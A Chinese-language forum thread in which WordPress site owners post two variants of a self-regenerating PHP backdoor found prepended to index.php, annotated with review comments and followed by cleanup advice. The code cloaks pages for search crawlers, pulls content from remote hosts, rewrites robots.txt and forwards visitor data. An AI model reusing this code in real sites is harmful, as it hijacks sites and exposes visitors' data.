我们的 cPanel WordPress 网站会自动生成下面这个 index.php

<?php $group_num = 'z9126zn';
// NOTE(review): $group_num appears only here, as the subdomain label of the
// remote host. Every backend URL this code contacts is built from
// $inter_domain, so the resulting hostname is the network indicator to look
// for in DNS, proxy and egress-firewall logs of the affected server.
$inter_domain = 'http://' . $group_num . '.lievful.quest';
/**
 * Fetches $url with a plain cURL GET and returns whatever curl_exec() yields.
 *
 * Only the URL, "return the transfer as a string" and a 5-second connect
 * timeout are configured; the result is returned without any error check.
 * In this file it is used only as a fallback for file_get_contents() when
 * submitting sitemap URLs.
 *
 * @param string $url Address to request.
 * @return string|bool Result of curl_exec(): the response body, or false on failure.
 */
function curl_get_contents($url)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    // Return the body as a string instead of printing it.
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    // Give up after 5 seconds if no connection can be established.
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
    $file_contents = curl_exec($ch);
    curl_close($ch);
    return $file_contents;
}

/**
 * Sends $data as a form-encoded POST to $url and returns the response body.
 *
 * This is the single channel through which the file talks to the remote host
 * in $inter_domain. The callers echo the returned string to the visitor or
 * write it to robots.txt without inspecting it, so whoever controls that host
 * controls what this site serves.
 *
 * @param string $url  Endpoint to post to; spaces are replaced by '+'.
 * @param array  $data Key/value pairs sent as the POST body.
 * @return string|bool Response body, or false when cURL reports an error.
 */
function getServerCont($url, $data = array())
{
    $url = str_replace(' ', '+', $url);
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "$url");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    // Response headers are not included in the returned string.
    curl_setopt($ch, CURLOPT_HEADER, 0);
    // Whole transfer is capped at 10 seconds; each page view that reaches a
    // call to this function can therefore stall for up to that long.
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    curl_setopt($ch, CURLOPT_POST, 1);
    // Certificate and host-name verification are both switched off, so any
    // certificate is accepted if the endpoint is reached over TLS.
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
    $output = curl_exec($ch);
    $errorCode = curl_errno($ch);
    curl_close($ch);
    // Any cURL-level error collapses to false; HTTP status codes are not checked.
    if (0 !== $errorCode) {
        return false;
    }
    return $output;
}

/**
 * Reports whether a User-Agent string looks like a search-engine crawler.
 *
 * The test is a case-sensitive substring search for 'google' or 'yahoo'; the
 * caller in this file lower-cases the header before passing it in. The result
 * decides whether the request is answered with remote content instead of the
 * real site (cloaking), which is why the site can look normal in a browser
 * while search engines index something else.
 *
 * @param string $agent Lower-cased User-Agent header value.
 * @return bool True when either substring is present.
 */
function is_crawler($agent)
{
    if (strpos($agent, 'google') !== false || strpos($agent, 'yahoo') !== false) {
        return true;
    } else {
        return false;
    }
}

/**
 * Reports whether a Referer header contains '.co.jp' or 'google.com'.
 *
 * The caller uses a true result to treat the visitor as arriving from a search
 * result and to hand the request to the remote "jump" endpoint.
 *
 * @param string $refer Referer header value (empty string when absent).
 * @return bool True when either substring is present.
 */
function check_refer($refer)
{
    if (strpos($refer, '.co.jp') !== false || strpos($refer, 'google.com') !== false) {
        return true;
    } else {
        return false;
    }
}

// ---------------------------------------------------------------------------
// Request dispatcher of the prepended code. It runs on every request to this
// file, ahead of the WordPress loader that follows it, and either answers the
// request itself with content fetched from $inter_domain (then exits) or falls
// through to WordPress. Ordinary visitors therefore see the normal site, while
// crawlers and search-referred visitors are served remote content.
// NOTE(review): to confirm this behaviour on a suspect site, compare the
// response for a normal browser request with one carrying a crawler User-Agent.
// ---------------------------------------------------------------------------

// Request facts taken from $_SERVER; HTTP_HOST and REQUEST_URI are client-supplied.
$http = ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https://' : 'http://');
$req_uri = $_SERVER['REQUEST_URI'];
$domain = $_SERVER["HTTP_HOST"];
$self = $_SERVER['PHP_SELF'];
$ser_name = $_SERVER['SERVER_NAME'];
$req_url = $http . $domain . $req_uri;
// Remote endpoints on $inter_domain; each one is contacted with a POST via getServerCont().
$indata1 = $inter_domain . "/indata.php";
$map1 = $inter_domain . "/map.php";
$jump1 = $inter_domain . "/jump.php";
$url_words = $inter_domain . "/words.php";
$url_robots = $inter_domain . "/robots.php";
// Base URL reported to the remote host: includes the script path only when the
// request URI itself contains ".php".
if (strpos($req_uri, ".php")) {
    $href1 = $http . $domain . $self;
} else {
    $href1 = $http . $domain;
}
// Payload sent with every POST. The first statement appends an empty array at
// key 0; the named keys carry the actual data.
$data1[] = array();
$data1['http'] = $http;
$data1['domain'] = $domain;
$data1['req_uri'] = $req_uri;
$data1['href'] = $href1;
$data1['req_url'] = $req_url;
$user_agent = strtolower(isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '');
// Visitor address: client-supplied headers (Client-IP, X-Forwarded-For) are
// preferred over REMOTE_ADDR, so the recorded value is whatever the client claims.
if(getenv('HTTP_CLIENT_IP')){
$client_ip = getenv('HTTP_CLIENT_IP');
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
$client_ip = getenv('HTTP_X_FORWARDED_FOR');
} elseif(getenv('REMOTE_ADDR')) {
$client_ip = getenv('REMOTE_ADDR');
} else {
$client_ip = $_SERVER['REMOTE_ADDR'];
}
// Branch 1: any request whose URI ends in "robots" overwrites robots.txt in
// the directory derived from __FILE__ with text fetched from the remote host,
// then reports success or failure. During cleanup, robots.txt has to be
// reviewed and restored as well, not only this file.
if (substr($req_uri, -6) == 'robots') {
    $robots_cont = getServerCont($url_robots, $data1);
    define('BASE_PATH', str_ireplace($_SERVER['PHP_SELF'], '', __FILE__));
    file_put_contents(BASE_PATH . '/robots.txt', $robots_cont);
    $robots_cont = file_get_contents(BASE_PATH . '/robots.txt');
    if (strpos($robots_cont, "Crawl-delay:3")) {
        echo 'robots.txt file create success!';
    } else {
        echo 'robots.txt file create fail!';
    }
    exit;
}
// Branch 2: requests ending in ".xml" are answered with sitemap data that
// comes from the remote host, never from WordPress.
if (substr($req_uri, -4) == '.xml') {
    // "pingsitemap.xml": fetch a comma-separated list of names from map.php and
    // submit one sitemap URL per name (plus "sitemap") to Google's ping
    // endpoint, printing a status line for each. Presumably a self-test page
    // for whoever planted the code; it is reachable by anyone.
    if (strpos($req_uri, "pingsitemap.xml")) {
        $str_cont = getServerCont($map1, $data1);
        $str_cont_arr = explode(",", $str_cont);
        $str_cont_arr[] = 'sitemap';
        for ($k = 0; $k < count($str_cont_arr); $k++) {
            if (strpos($href1, ".php") > 0) {
                $tt1 = '?';
            } else {
                $tt1 = '/';
            }
            $http2 = $href1 . $tt1 . $str_cont_arr[$k] . '.xml';
            $data_new = 'https://www.google.com/ping?sitemap=' . $http2;
            $data_new1 = 'http://www.google.com/ping?sitemap=' . $http2;
            // Tries https then http, each with file_get_contents() and then
            // cURL; warnings are suppressed with "@".
            if (stristr(@file_get_contents($data_new), 'successfully')) {
                echo $data_new . '===>Submitting Google Sitemap: OK' . PHP_EOL;
            } else if (stristr(@curl_get_contents($data_new), 'successfully')) {
                echo $data_new . '===>Submitting Google Sitemap: OK' . PHP_EOL;
            } else if (stristr(@file_get_contents($data_new1), 'successfully')) {
                echo $data_new1 . '===>Submitting Google Sitemap: OK' . PHP_EOL;
            } else if (stristr(@curl_get_contents($data_new1), 'successfully')) {
                echo $data_new1 . '===>Submitting Google Sitemap: OK' . PHP_EOL;
            } else {
                echo $data_new1 . '===>Submitting Google Sitemap: fail' . PHP_EOL;
            }
        }
        exit;
    }
    // "allsitemap.xml": relay the response of map.php as XML.
    if (strpos($req_uri, "allsitemap.xml")) {
        $str_cont = getServerCont($map1, $data1);
        header("Content-type:text/xml");
        echo $str_cont;
        exit;
    }
    // Any other .xml name: extract the name from the URI and ask words.php
    // whether it should be served.
    if (strpos($req_uri, ".php")) {
        $word4 = explode("?", $req_uri);
        $word4 = $word4[count($word4) - 1];
        $word4 = str_replace(".xml", "", $word4);
    } else {
        $word4 = str_replace("/", "", $req_uri);
        $word4 = str_replace(".xml", "", $word4);
    }
    $data1['word'] = $word4;
    $data1['action'] = 'check_sitemap';
    $check_url4 = getServerCont($url_words, $data1);
    if ($check_url4 == '1') {
        $str_cont = getServerCont($map1, $data1);
        header("Content-type:text/xml");
        echo $str_cont;
        exit;
    }
    $data1['action'] = "check_words";
    $check1 = getServerCont($url_words, $data1);
    if (strpos($req_uri, "map") > 0 || $check1 == '1') {
        $data1['action'] = "rand_xml";
        $check_url4 = getServerCont($url_words, $data1);
        header("Content-type:text/xml");
        echo $check_url4;
        exit;
    }
    // No match: the .xml request falls through to the checks below.
}
// Address of this script as reported to the remote host (built from SERVER_NAME).
if (strpos($req_uri, ".php")) {
    $main_shell = $http . $ser_name . $self;
    $data1['main_shell'] = $main_shell;
} else {
    $main_shell = $http . $ser_name;
    $data1['main_shell'] = $main_shell;
}
// Branch 3: visitors whose Referer contains '.co.jp' or 'google.com'. Their
// referer, claimed IP address, User-Agent and Accept-Language are posted to
// jump.php, and the response is echoed to them unless it is exactly "404".
// This discloses visitor data to the remote host on top of replacing the page.
$referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
$chk_refer = check_refer($referer);
$bot=true;
if ($chk_refer) {
    $data1['referer'] = $referer;
    $data1['ip'] = $client_ip;
    $data1['user_agent'] = $user_agent;
    $data1['browser_la'] = $_SERVER['HTTP_ACCEPT_LANGUAGE'];
    $refer_content = getServerCont($jump1, $data1);
    if ($refer_content != "404") {
        echo $refer_content;
        exit;
    }
    // A "404" answer for a search-referred visitor also disables the crawler branch.
    $bot=false;
}
// Branch 4: crawler User-Agents receive whatever indata.php returns; the
// literal replies "404", "500" and "blank" are turned into the matching
// status line or an empty page. Every path in this branch exits, so WordPress
// never runs for these requests.
$res_crawl = is_crawler($user_agent);
if ($res_crawl&&$bot) {
    $data1['http_user_agent'] = $user_agent;
    $get_content = getServerCont($indata1, $data1);
    if ($get_content == "404") {
        header('HTTP/1.0 404 Not Found');
        exit;
    } else if ($get_content == "500") {
        header("HTTP/1.0 500 Internal Server Error");
        exit;
    } else if ($get_content == "blank") {
        echo '';
        exit;
    } else {
        echo $get_content;
        exit;
    }
} ?><?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

// NOTE(review): the define and the require below are the only statements this
// header describes. Code found in the same file ahead of this header is not
// covered by it; when cleaning up, compare the file against a clean copy of
// the same WordPress release rather than editing it by hand.

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';

这是我们无法控制的 index.php 文件。

我们使用 GoDaddy 的 VPS 服务器,带 cPanel 和 WordPress 托管。我们在某个目录中安装了 WordPress 站点,该目录下会自动生成 index 文件,打开站点时显示 HTTP ERROR 500。

这个文件是在我们的 VPS 服务器上自动创建的:我们修改它,它会被自动改回去;我们删除它,它又会被自动重新创建。

简而言之,我们无法控制目录和这个文件。

php wordpress cpanel vps virus
1个回答

我也有同样的问题

<?php $group_num = 'z0109_18';
// NOTE(review): in this sample the remote host is a bare IP address and
// $group_num is a path segment under it. Every backend URL below is built from
// $inter_domain, so this address is the network indicator to look for in
// proxy and egress-firewall logs of the affected server.
$inter_domain = 'http://107.150.41.2//' . $group_num . '/';
/**
 * Fetches $url with a plain cURL GET and returns whatever curl_exec() yields.
 *
 * Only the URL, "return the transfer as a string" and a 5-second connect
 * timeout are configured; the result is returned without any error check.
 *
 * @param string $url Address to request.
 * @return string|bool Result of curl_exec(): the response body, or false on failure.
 */
function curl_get_contents($url)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    // Return the body as a string instead of printing it.
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    // Give up after 5 seconds if no connection can be established.
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
    $file_contents = curl_exec($ch);
    curl_close($ch);
    return $file_contents;
}

/**
 * Sends $data as a form-encoded POST to $url and returns the response body.
 *
 * All traffic to the remote host in $inter_domain goes through this function.
 * The callers echo the returned string or write it to robots.txt without
 * inspecting it, so the remote host decides what this site serves.
 *
 * @param string $url  Endpoint to post to; spaces are replaced by '+'.
 * @param array  $data Key/value pairs sent as the POST body.
 * @return string|bool Response body, or false when cURL reports an error.
 */
function getServerCont($url, $data = array())
{
    $url = str_replace(' ', '+', $url);
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "$url");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    // Response headers are not included in the returned string.
    curl_setopt($ch, CURLOPT_HEADER, 0);
    // Whole transfer is capped at 10 seconds.
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);
    curl_setopt($ch, CURLOPT_POST, 1);
    // Certificate and host-name verification are both switched off.
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
    $output = curl_exec($ch);
    $errorCode = curl_errno($ch);
    curl_close($ch);
    // Any cURL-level error collapses to false; HTTP status codes are not checked.
    if (0 !== $errorCode) {
        return false;
    }
    return $output;
}

/**
 * Reports whether a User-Agent string looks like a search-engine crawler.
 *
 * A non-empty agent is matched case-insensitively against the alternation
 * googlebot|google|yahoo|bing|aol. The caller uses a true result to answer the
 * request with remote content instead of the real site (cloaking).
 *
 * @param string $agent User-Agent header value.
 * @return bool True when one of the listed names occurs in $agent.
 */
function is_crawler($agent)
{
    $agent_check = false;
    $bots = 'googlebot|google|yahoo|bing|aol';
    if ($agent != '') {
        if (preg_match("/($bots)/si", $agent)) {
            $agent_check = true;
        }
    }
    return $agent_check;
}

/**
 * Reports whether a Referer header points at one of three search hosts.
 *
 * A non-empty referer is matched case-insensitively against
 * google.co.jp|yahoo.co.jp|google.com; the dots are not escaped, so each one
 * matches any character.
 *
 * @param string $refer Referer header value (empty string when absent).
 * @return bool True when the pattern matches.
 */
function check_refer($refer)
{
    $check_refer = false;
    $referbots = 'google.co.jp|yahoo.co.jp|google.com';
    if ($refer != '' && preg_match("/($referbots)/si", $refer)) {
        $check_refer = true;
    }
    return $check_refer;
}

// ---------------------------------------------------------------------------
// Request dispatcher of this second sample. Same structure as the variant in
// the question: requests for "robots", "*.xml", search-referred visitors and
// crawler User-Agents are answered with content fetched from $inter_domain.
// Where the first sample calls exit, this one uses a file-scope return, which
// stops this file from executing any further.
// ---------------------------------------------------------------------------

// Request facts taken from $_SERVER; HTTP_HOST and REQUEST_URI are client-supplied.
$http = ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https://' : 'http://');
$req_uri = $_SERVER['REQUEST_URI'];
$domain = $_SERVER["HTTP_HOST"];
$self = $_SERVER['PHP_SELF'];
$ser_name = $_SERVER['SERVER_NAME'];
$req_url = $http . $domain . $req_uri;
// Remote endpoints on $inter_domain; each one is contacted with a POST via getServerCont().
$indata1 = $inter_domain . "/indata.php";
$map1 = $inter_domain . "/map.php";
$jump1 = $inter_domain . "/jump.php";
$url_words = $inter_domain . "/words.php";
$url_robots = $inter_domain . "/robots.php";
// Base URL reported to the remote host.
if (strpos($req_uri, ".php")) {
    $href1 = $http . $domain . $self;
} else {
    $href1 = $http . $domain;
}
// Payload sent with every POST. The first statement appends an empty array at
// key 0; the named keys carry the actual data.
$data1[] = array();
$data1['domain'] = $domain;
$data1['req_uri'] = $req_uri;
$data1['href'] = $href1;
$data1['req_url'] = $req_url;
// Branch 1: a request whose URI ends in "robots" overwrites robots.txt with
// text from the remote host and reports whether the word "sitemap" is in it.
// During cleanup, robots.txt has to be reviewed and restored as well.
if (substr($req_uri, -6) == 'robots') {
    $robots_cont = getServerCont($url_robots, $data1);
    define('BASE_PATH', str_ireplace($_SERVER['PHP_SELF'], '', __FILE__));
    file_put_contents(BASE_PATH . '/robots.txt', $robots_cont);
    $robots_cont = file_get_contents(BASE_PATH . '/robots.txt');
    if (strpos(strtolower($robots_cont), "sitemap")) {
        echo 'robots.txt file create success!';
    } else {
        echo 'robots.txt file create fail!';
    }
    return;
}
// Branch 2: requests ending in ".xml" are answered with data from the remote host.
if (substr($req_uri, -4) == '.xml') {
    // "pingsitemap.xml": submit one sitemap URL per name returned by map.php
    // (plus "sitemap") to Google's ping endpoint and print a status line each.
    if (strpos($req_uri, "pingsitemap.xml")) {
        $str_cont = getServerCont($map1, $data1);
        $str_cont_arr = explode(",", $str_cont);
        $str_cont_arr[] = 'sitemap';
        for ($k = 0; $k < count($str_cont_arr); $k++) {
            if (strpos($href1, ".php") > 0) {
                $tt1 = '?';
            } else {
                $tt1 = '/';
            }
            $http2 = $href1 . $tt1 . $str_cont_arr[$k] . '.xml';
            $data_new = 'https://www.google.com/ping?sitemap=' . $http2;
            $data_new1 = 'http://www.google.com/ping?sitemap=' . $http2;
            // Tries https then http, each with file_get_contents() and then
            // cURL; warnings are suppressed with "@".
            if (stristr(@file_get_contents($data_new), 'successfully')) {
                echo $data_new . '===>Submitting Google Sitemap: OK' . PHP_EOL;
            } else if (stristr(@curl_get_contents($data_new), 'successfully')) {
                echo $data_new . '===>Submitting Google Sitemap: OK' . PHP_EOL;
            } else if (stristr(@file_get_contents($data_new1), 'successfully')) {
                echo $data_new1 . '===>Submitting Google Sitemap: OK' . PHP_EOL;
            } else if (stristr(@curl_get_contents($data_new1), 'successfully')) {
                echo $data_new1 . '===>Submitting Google Sitemap: OK' . PHP_EOL;
            } else {
                echo $data_new1 . '===>Submitting Google Sitemap: fail' . PHP_EOL;
            }
        }
        return;
    }
    // "allsitemap.xml": relay the response of map.php as XML.
    if (strpos($req_uri, "allsitemap.xml")) {
        $str_cont = getServerCont($map1, $data1);
        header("Content-type:text/xml");
        echo $str_cont;
        return;
    }
    // Any other .xml name: extract the name from the URI and consult words.php.
    if (strpos($req_uri, ".php")) {
        $word4 = explode("?", $req_uri);
        $word4 = $word4[count($word4) - 1];
        $word4 = str_replace(".xml", "", $word4);
    } else {
        $word4 = str_replace("/", "", $req_uri);
        $word4 = str_replace(".xml", "", $word4);
    }
    $data1['word'] = $word4;
    $data1['action'] = 'check_sitemap';
    $check_url4 = getServerCont($url_words, $data1);
    if ($check_url4 == '1') {
        $str_cont = getServerCont($map1, $data1);
        header("Content-type:text/xml");
        echo $str_cont;
        return;
    }
    $data1['action'] = "check_words";
    $check1 = getServerCont($url_words, $data1);
    // The brace-less if governs only the assignment on its own line; the three
    // statements after it run for every .xml request that reaches this point,
    // so all remaining .xml requests are answered by the remote host.
    if (strpos($req_uri, "map") > 0 || $check1 == '1') $data1['action'] = "rand_xml";
    $check_url4 = getServerCont($url_words, $data1);
    header("Content-type:text/xml");
    echo $check_url4;
    return;
}
// Address of this script as reported to the remote host (built from SERVER_NAME).
if (strpos($req_uri, ".php")) {
    $main_shell = $http . $ser_name . $self;
    $data1['main_shell'] = $main_shell;
} else {
    $main_shell = $http . $ser_name;
    $data1['main_shell'] = $main_shell;
}
$referer = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
$chk_refer = check_refer($referer);
// Separator used to split the request URI into its last segment below.
if (strpos($_SERVER['REQUEST_URI'], '.php')) {
    $url_ext = '?';
} else {
    $url_ext = '/';
}
// Branch 3: a search-engine referer combined with either an Accept-Language
// header containing "ja" (tested twice) or a last URI segment of lower-case
// letters/digits ending in a digit. Such visitors get the jump.php response
// echoed in place of the real page.
if ($chk_refer && (preg_match('/ja/i', @$_SERVER['HTTP_ACCEPT_LANGUAGE']) || preg_match('/ja/i', @$_SERVER['HTTP_ACCEPT_LANGUAGE']) || preg_match("/^[a-z0-9]+[0-9]+$/", end(explode($url_ext, str_replace(array(".html", ".htm"), "", $_SERVER['REQUEST_URI'])))))) {
    echo getServerCont($jump1, $data1);
    return;
}
// Branch 4: crawler User-Agents receive whatever indata.php returns, unfiltered.
$user_agent = strtolower(isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '');
$res_crawl = is_crawler($user_agent);
if ($res_crawl) {
    $data1['http_user_agent'] = $user_agent;
    $get_content = getServerCont($indata1, $data1);
    echo $get_content;
    return;
} ?>

我目前唯一的解决办法是删除 index.php、recolection.php 以及 wp-admin 和 wp-includes 文件夹。

之后,我重新安装了 WordPress,该网站再次运行。

过了一会儿

我开始逐项检查,发现了 3 种可能的感染途径:

  • 多出来的 FTP 帐户(在 cPanel 中检查用户列表)
  • 会重新创建文件的 Cron 任务
  • cPanel 帐户被入侵。我更改了密码之后,问题就停止了。